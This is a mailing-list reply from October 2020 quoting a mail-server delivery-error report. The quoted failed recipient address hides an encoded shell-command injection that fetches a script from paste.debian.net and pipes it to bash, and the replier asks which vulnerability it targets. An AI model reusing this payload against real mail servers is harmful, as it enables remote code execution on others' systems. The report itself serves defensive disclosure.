Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):
> To whom this may concern,
>
> I got a system message from my mailer daemon lately. It contains
>
> -------------------------------- cut --------------------------------
> Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
> The sender is <>.
>
> The following address(es) have yet to be delivered:
>
> ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-
> \thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas
> h\x22}}@ianm-mang.math.kit.edu:
> Too many "Received" headers - suspected mail loop
> -------------------------------- cut --------------------------------
[..]
> I don't know if this messages reaches the right persons, but someone may
> forward it. You may at least remove the files which are accessible on
> paste.debian.net.Clearly someone tries to run a command put as an address. Out of curiosity: Which kind of vulnerability are they trying to use here? Regards, Daniel -- Regards, Daniel Leidert <dleid...@debian.org> | https://www.wgdd.de/ GPG-Key RSA4096 / BEED4DED5544A4C03E283DC74BCD0567C296D05D GPG-Key ED25519 / BD3C132D8B3805D1808123AB7ACE00941E338C78 If you like my work consider sponsoring me via https://www.patreon.com/join/dleidert
signature.asc
Description: This is a digitally signed message part
